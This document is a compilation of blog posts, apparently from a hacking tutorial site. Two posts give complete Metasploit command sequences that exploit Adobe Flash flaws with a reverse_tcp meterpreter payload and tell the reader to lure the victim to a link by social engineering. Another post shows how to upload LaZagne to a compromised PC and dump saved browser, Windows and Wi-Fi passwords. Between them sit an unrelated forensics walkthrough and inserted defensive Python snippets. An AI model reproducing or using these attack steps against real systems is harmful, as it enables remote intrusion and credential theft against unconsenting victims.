First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you have the meterpreter session, use the ‘shell’ command to get a command prompt on the target

Now download LaZagne project from here and extract it on your PC. You can find the lazagne.exe file in the folder.

Now use the upload command to send a file to the target system.

To launch all modules, type laZagne.exe all. It will dump all the passwords that it can find, including all saved passwords in Google Chrome

You can see windows secret passwords

You can see all saved wifi profile passwords

The post Hack Browsers, Chat, Databases, Mails, Wifi Password in Remote Windows or Linux PC appeared first on Hacking Articles.

Forensics Investigation of RAW Images using Belkasoft Evidence Center

First of all, download the Belkasoft Evidence Center ultimate from this link.

Click on New Option to select the Raw Image.

Enter the Case Name.

Select the Root folder where Forensic Evidence will be created.

Then type the name of the investigator and Case Description. Click Ok.

Now select the Raw Image and Check the Option Analyze Data Source. Click on Next.

Now Select from supported data types and click on Next.

Now Select all and Click on Finish.

To visualize the cached sites exactly as seen by the user, click on the Cache in Browsers option.

To see the list of downloaded files, click on Downloaded Files.

To check the list of sites visited by the user, select the Sites option.

To see the cookie list, click on the Cookies option.

Now click on the Documents option and then select the Found Documents option to see all the office document files found on the user's PC.

To see all the encrypted files, click on the Found Encrypted files option. It will detect more than 150 types of encrypted files. It is also possible to decrypt all these encrypted files within this product by installing Passware Kit Forensic integrated with the Belkasoft product.

To find the picture list, select Found Pictures in the Pictures option. To detect forgery in a picture, right-click on the picture, select Analyze Pictures and click on the Detect Forgery tab.

To find the recent files opened by Acrobat Reader, click on the Adobe Acrobat Reader Recent option.

To see recent applications run by the user, click on the Last Application and Paths in NTUSER.DAT option. NTUSER.DAT is a registry file in the Windows operating system. Every user profile contains an NTUSER.DAT file. It contains a unique Documents folder, Start menu configuration, Desktop properties and browsing history.
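Before relying on values parsed out of an NTUSER.DAT hive, an examiner can confirm that the file really is a registry hive and that its header is intact. The following is an added example, not part of the original article or of the Belkasoft product: the header offsets follow the commonly documented regf base-block layout (an assumption, since the article does not describe the format), and the sample header is constructed.

```python
import struct
from datetime import datetime, timedelta, timezone

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)

def regf_checksum(header):
    """XOR of the first 127 little-endian dwords (bytes 0..507)."""
    x = 0
    for (dword,) in struct.iter_unpack("<I", header[:508]):
        x ^= dword
    # Two results are reserved and remapped by the format.
    return {0xFFFFFFFF: 0xFFFFFFFE, 0: 1}.get(x, x)

def inspect_hive_header(header):
    """Validate the 512-byte base block of a hive such as NTUSER.DAT."""
    if len(header) < 512 or header[:4] != b"regf":
        raise ValueError("missing regf signature: not a registry hive")
    seq1, seq2, filetime, major, minor = struct.unpack_from("<IIQII", header, 4)
    (stored,) = struct.unpack_from("<I", header, 508)
    name = header[48:112].decode("utf-16-le", "replace").split("\x00")[0]
    return {
        "version": f"{major}.{minor}",
        "last_written": EPOCH_1601 + timedelta(microseconds=filetime // 10),
        "embedded_name": name,
        # Differing sequence numbers mean a write was not completed, so the
        # transaction logs may hold newer data than the hive file itself.
        "dirty": seq1 != seq2,
        "checksum_ok": stored == regf_checksum(header),
    }

def build_sample_header(seq1=7, seq2=7):
    """Constructed 512-byte header for the demo; not taken from a real system."""
    written = datetime(2015, 7, 1, tzinfo=timezone.utc)
    filetime = int((written - EPOCH_1601).total_seconds()) * 10**7
    hdr = bytearray(512)
    hdr[0:4] = b"regf"
    struct.pack_into("<IIQII", hdr, 4, seq1, seq2, filetime, 1, 5)
    name = "\\Users\\raj\\ntuser.dat".encode("utf-16-le")
    hdr[48:48 + len(name)] = name
    struct.pack_into("<I", hdr, 508, regf_checksum(bytes(hdr)))
    return bytes(hdr)

if __name__ == "__main__":
    print(inspect_hive_header(build_sample_header()))
    print(inspect_hive_header(build_sample_header(seq1=8, seq2=7))["dirty"])
```

On a real case, pass the first 512 bytes of the exported hive to `inspect_hive_header`; a hive copied from a live, logged-on profile will often report `dirty`.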

To see the last files selected by the user, click on Last Selected Files.

To check the recent files opened by the user, click on the Recent files option.

To detect the latest searches by the user, click on the Searches option.

To find the files most recently accessed by the user, click on Recently accessed documents.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with a high level of expertise in handling server-side operations based on the Windows platform. An experienced IT Technical Trainer with over 20 years’ experience. You can contact him at mukul@ignitetechnologies.in

The post Forensics Investigation of RAW Images using Belkasoft Evidence Center appeared first on Hacking Articles.

Hack Remote Windows PC using Adobe Flash Player Drawing Fill Shader Memory Corruption

This module exploits a memory corruption that occurs when applying a Shader as a drawing fill, as exploited in the wild in June 2015. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188, Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188, and Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.

Exploit Targets

Windows 7

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open a Kali terminal and type msfconsole

Now type use exploit/multi/browser/adobe_flash_shader_drawing_fill

msf exploit (adobe_flash_shader_drawing_fill)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_shader_drawing_fill)>set lhost 192.168.0.125 (IP of Local Host)

msf exploit (adobe_flash_shader_drawing_fill)>set srvhost 192.168.0.125

msf exploit (adobe_flash_shader_drawing_fill)>set uripath /

msf exploit (adobe_flash_shader_drawing_fill)>exploit

Now give the following URL to the victim: http://192.168.0.125:8080

Send the link of the server to the victim via chat or email or any social engineering technique.

Now when the victim opens the link (http://192.168.0.125:8080), a session will be opened as shown below.

Now type sessions -l to display the sessions opened when the victim opens the link.

Now that the session has opened, type sysinfo to get system information, then type shell to enter the victim's command prompt.

The post Hack Remote Windows PC using Adobe Flash Player Drawing Fill Shader Memory Corruption appeared first on Hacking Articles.

Hack Remote PC using Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow

This module exploits a buffer overflow in Adobe Flash Player when handling nellymoser encoded audio inside an FLV video, as exploited in the wild in June 2015. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160, Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466. Note that this exploit is effective against both CVE-2015-3113 and the earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression to the same root cause as CVE-2015-3043.

Exploit Targets

Windows 7

Windows 8

Firefox 38.0.5

Adobe Flash 18.0.0.160

Adobe Flash 11.2.202.466

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open a Kali terminal and type msfconsole

Now type use exploit/multi/browser/adobe_flash_nellymoser_bof

msf exploit (adobe_flash_nellymoser_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_nellymoser_bof)>set lhost 192.168.0.125 (IP of Local Host)

msf exploit (adobe_flash_nellymoser_bof)>set srvhost 192.168.0.125

msf exploit (adobe_flash_nellymoser_bof)>set uripath /

msf exploit (adobe_flash_nellymoser_bof)>exploit

Now give the following URL to the victim: http://192.168.0.125:8080

Send the link of the server to the victim via chat or email or any social engineering technique.

Now when the victim opens the link (http://192.168.0.125:8080), a session will be opened as shown below.

Now type sessions -l to display the sessions opened when the victim opens the link.

Now that the session has opened, type sysinfo to get system information, then type shell to enter the victim's command prompt.
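Both Flash walkthroughs above deliver content from a bare IP address on port 8080, which is a pattern a web proxy can surface. The following is an added example, not part of the original posts: the log format, sample lines and file name are constructed, and it assumes the proxy records the response content type.

```python
import ipaddress
from urllib.parse import urlsplit

FLASH_MIME = "application/x-shockwave-flash"
USUAL_PORTS = {80, 443}

def parse_line(line):
    """Constructed log format: timestamp client method url status content-type."""
    ts, client, method, url, status, ctype = line.split()
    return {"ts": ts, "client": client, "url": url,
            "status": int(status), "ctype": ctype.lower()}

def is_bare_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def suspicious_flash_deliveries(lines):
    """Flash responses served from a bare-IP host on an unusual port."""
    hits = []
    landing = {}  # (client, host:port) -> first HTML page fetched from that host
    for rec in map(parse_line, lines):
        parts = urlsplit(rec["url"])
        port = parts.port or (443 if parts.scheme == "https" else 80)
        if not (parts.hostname and is_bare_ip(parts.hostname)
                and port not in USUAL_PORTS):
            continue
        key = (rec["client"], parts.netloc)
        if rec["ctype"].startswith("text/html"):
            landing.setdefault(key, rec["url"])
        elif rec["ctype"] == FLASH_MIME and rec["status"] == 200:
            hits.append({"client": rec["client"], "swf": rec["url"],
                         "landing": landing.get(key), "ts": rec["ts"]})
    return hits

# Constructed sample proxy log lines.
SAMPLE_LOG = [
    "2015-07-01T10:00:01Z 192.168.0.110 GET http://192.168.0.125:8080/ 200 text/html",
    "2015-07-01T10:00:02Z 192.168.0.110 GET http://192.168.0.125:8080/sample.swf 200 application/x-shockwave-flash",
    "2015-07-01T10:05:00Z 192.168.0.111 GET http://videos.example.com/player.swf 200 application/x-shockwave-flash",
    "2015-07-01T10:06:00Z 192.168.0.112 GET http://10.0.0.5/index.html 200 text/html",
]

if __name__ == "__main__":
    for hit in suspicious_flash_deliveries(SAMPLE_LOG):
        print(hit)
```

Each hit names the client that received the content, which is the host to check for the Flash versions listed in the two posts.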

The post Hack Remote PC using Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow appeared first on Hacking Articles.
